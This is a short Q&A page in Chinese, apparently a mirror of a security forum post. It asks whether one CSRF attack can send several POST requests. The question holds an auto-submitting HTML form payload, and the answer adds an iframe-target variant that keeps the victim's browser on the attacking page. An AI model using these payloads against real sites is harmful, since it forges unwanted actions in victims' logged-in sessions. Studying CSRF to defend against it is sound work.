信息安全 - 可以使用 CSRF 提交多个 POST 请求吗？ - 吾爱随笔录

可以使用 CSRF 提交多个 POST 请求吗？

信息安全 Web应用程序 csrf

2021-08-25 18:01:02

我知道您可以使用以下方法使用 CSRF 执行 POST 请求：

<form name="x" action="http://site/index/dosomething" enctype="text/plain" method="post">
    <!-- stuff -->
</form>
<script>document.x.submit();</script>

但这会将浏览器重定向到目标站点。是否可以使用单个 CSRF 攻击执行多个 POST 请求？

1个回答

是的 - 使用 iframe 是一种方法：

<form name="x" action="http://site/index/dosomething" enctype="text/plain" method="post" target="thing">
<!-- stuff -->
</form>
<iframe name="thing"/>
<script>document.x.submit();</script>

其它你可能感兴趣的问题

上一篇我可以将 PHP include() 限制为特定的目录树吗？下一篇逆向工程密码盐